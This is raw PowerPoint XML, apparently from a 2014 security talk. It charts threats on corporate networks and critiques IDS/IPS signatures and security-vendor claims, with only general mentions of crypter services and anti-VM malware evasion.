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48" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId55"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId56"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="458" r:id="rId6"/>
    <p:sldId id="659" r:id="rId7"/>
    <p:sldId id="660" r:id="rId8"/>
    <p:sldId id="671" r:id="rId9"/>
    <p:sldId id="663" r:id="rId10"/>
    <p:sldId id="661" r:id="rId11"/>
    <p:sldId id="662" r:id="rId12"/>
    <p:sldId id="688" r:id="rId13"/>
    <p:sldId id="696" r:id="rId14"/>
    <p:sldId id="700" r:id="rId15"/>
    <p:sldId id="698" r:id="rId16"/>
    <p:sldId id="695" r:id="rId17"/>
    <p:sldId id="697" r:id="rId18"/>
    <p:sldId id="699" r:id="rId19"/>
    <p:sldId id="710" r:id="rId20"/>
    <p:sldId id="693" r:id="rId21"/>
    <p:sldId id="674" r:id="rId22"/>
    <p:sldId id="675" r:id="rId23"/>
    <p:sldId id="677" r:id="rId24"/>
    <p:sldId id="678" r:id="rId25"/>
    <p:sldId id="708" r:id="rId26"/>
    <p:sldId id="682" r:id="rId27"/>
    <p:sldId id="689" r:id="rId28"/>
    <p:sldId id="709" r:id="rId29"/>
    <p:sldId id="619" r:id="rId30"/>
    <p:sldId id="685" r:id="rId31"/>
    <p:sldId id="684" r:id="rId32"/>
    <p:sldId id="711" r:id="rId33"/>
    <p:sldId id="617" r:id="rId34"/>
    <p:sldId id="618" r:id="rId35"/>
    <p:sldId id="717" r:id="rId36"/>
    <p:sldId id="621" r:id="rId37"/>
    <p:sldId id="715" r:id="rId38"/>
    <p:sldId id="716" r:id="rId39"/>
    <p:sldId id="610" r:id="rId40"/>
    <p:sldId id="670" r:id="rId41"/>
    <p:sldId id="686" r:id="rId42"/>
    <p:sldId id="666" r:id="rId43"/>
    <p:sldId id="702" r:id="rId44"/>
    <p:sldId id="691" r:id="rId45"/>
    <p:sldId id="703" r:id="rId46"/>
    <p:sldId id="690" r:id="rId47"/>
    <p:sldId id="706" r:id="rId48"/>
    <p:sldId id="707" r:id="rId49"/>
    <p:sldId id="667" r:id="rId50"/>
    <p:sldId id="668" r:id="rId51"/>
    <p:sldId id="669" r:id="rId52"/>
    <p:sldId id="656" r:id="rId53"/>
    <p:sldId id="596"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9A8E876-40F9-514C-9CF4-2039637F4042}">
          <p14:sldIdLst>
            <p14:sldId id="458"/>
            <p14:sldId id="659"/>
            <p14:sldId id="660"/>
            <p14:sldId id="671"/>
            <p14:sldId id="663"/>
            <p14:sldId id="661"/>
            <p14:sldId id="662"/>
            <p14:sldId id="688"/>
            <p14:sldId id="696"/>
            <p14:sldId id="700"/>
            <p14:sldId id="698"/>
            <p14:sldId id="695"/>
            <p14:sldId id="697"/>
            <p14:sldId id="699"/>
            <p14:sldId id="710"/>
            <p14:sldId id="693"/>
            <p14:sldId id="674"/>
            <p14:sldId id="675"/>
            <p14:sldId id="677"/>
            <p14:sldId id="678"/>
            <p14:sldId id="708"/>
            <p14:sldId id="682"/>
            <p14:sldId id="689"/>
            <p14:sldId id="709"/>
            <p14:sldId id="619"/>
            <p14:sldId id="685"/>
            <p14:sldId id="684"/>
            <p14:sldId id="711"/>
            <p14:sldId id="617"/>
            <p14:sldId id="618"/>
            <p14:sldId id="717"/>
            <p14:sldId id="621"/>
            <p14:sldId id="715"/>
            <p14:sldId id="716"/>
            <p14:sldId id="610"/>
            <p14:sldId id="670"/>
            <p14:sldId id="686"/>
            <p14:sldId id="666"/>
            <p14:sldId id="702"/>
            <p14:sldId id="691"/>
            <p14:sldId id="703"/>
            <p14:sldId id="690"/>
            <p14:sldId id="706"/>
            <p14:sldId id="707"/>
            <p14:sldId id="667"/>
            <p14:sldId id="668"/>
            <p14:sldId id="669"/>
            <p14:sldId id="656"/>
            <p14:sldId id="596"/>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71B532"/>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80000" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="-1830" y="-96"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="49482"/>
    </p:cViewPr>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="66" d="100"/>
        <a:sy n="66" d="100"/>
      </p:scale>
      <p:origin x="0" y="232"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="71" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="-327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1600"/>
          </a:pPr>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </c:txPr>
    </c:title>
    <c:autoTitleDeleted val="0"/>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Threats On Corporate Network</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="F92DE1"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="FB73EB"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>[Workbook1]Sheet1!$B$2:$B$7</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>Advanced Persistent Threat</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Botted or Compromised Hosts</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Under-capacity for bandwidth </c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Industrial Espionage</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Malicious Insider</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Other</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>[Workbook1]Sheet1!$C$2:$C$7</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>30.4</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>52</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>52.9</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>17.600000000000001</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>23.5</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>2</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="116091136"/>
        <c:axId val="116121600"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="116091136"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="0"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="800"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="116121600"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="116121600"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="116091136"/>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99DA0D2-1C10-40C6-BB6D-03B22DC71A75}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/6/2014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E9F48B-A955-488A-89AD-07BD13523B19}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15238863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4A7472-C9EE-3C4E-B7D0-CDB6631D659C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/6/2014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213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39216740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2800" dirty="0" smtClean="0"/>
              <a:t>The Good</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>We still have friends in these industries that are doing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" baseline="0" dirty="0" smtClean="0"/>
              <a:t> good things</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>We still believe in much of the underlying technology (but what’s the value today?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The Good &amp; The Bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Each product &amp; technology is good &amp; bad at certain things (tech generally differs significantly)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Some are better than others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The Good, The Bad, &amp; The Ugly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Some make more claims than others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Some are false claims</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Some false claims are the result of those deploying/selling, not the vendor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1706613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Ready and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> willing to encrypt anything – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> bots, banking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, password stealers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (“blockers”), etc. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4116683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The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> “AntiS” as they are called here are fairly common in such malware and they typically work unless the analysis infrastructure has been tweaked to avoid the countermeasure. Often attackers use the default settings which can make finding such malware easier when dealing with an infection. Legitimate applications don’t typically try to detect a virtual environment, which ironically works against people that use such settings because automated and static analysis tools can detect such techniques and work around them. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1708869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Ready and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> willing to encrypt anything – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> bots, banking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, password stealers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (“blockers”), etc. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2814498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huge difference between a vulnerability signature and a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> signature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerability signatures were far easier and more useful during the server era</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerability signatures are more often than not, impossible for content level vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Heuristic, behavioral, generic signatures can actually be better as things have changed (NOT CVE) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It’s not how many signatures you have, it’s how many are actually triggering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="106918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being, many products are now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> limited in policy visibility and / or adjustment.  Reporting doesn’t necessarily tell you what triggered and why</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="106918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IDS/IPS never worked perfectly. Ever.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>desmondholden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of course you are awesome but your signatures and product *never* stopped me from owning a network or even being detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>IDS/IPS gave you visibility, rarely did it stop attacks or exploits, ESPECIALLY on an internal network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This is the largest misconception about IDS/IPS EVER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>People forget, it was all we had at the time for visibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Technology has advanced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The breadth of detection has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>advanced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signatures aren’t dead, but be aware that you can’t and shouldn’t write a signature for everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The value in IDS/IPS isn’t necessarily detecting attack(s) using signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Visibility into your network always has and will be the value – not stopping all breaches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are many ways to gain network visibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I can do this all day, are you trying to tell me Solar Winds will allow me to build a custom sig for DNS traffic?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I’m with you, I’d use something reputation based and monitor flow. Because ids/signatures are now a feature of everything else we should make that clear. A combo is better, no one buys stand alone crap anymore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How small does this font get?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3267451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all know there is no silver bullet, &amp; yet you still attempt to buy one?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There is no such thing as a GOD box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Performance is always crap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Effectiveness is always questionable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The more things a vendor is asked to do, the less likely they are to be good at any of it (this is why many OEM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do you really need this as much as you think?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Are you introducing as many problems as you are solving?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9213187-B58C-3741-88C1-D58609F3D6BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
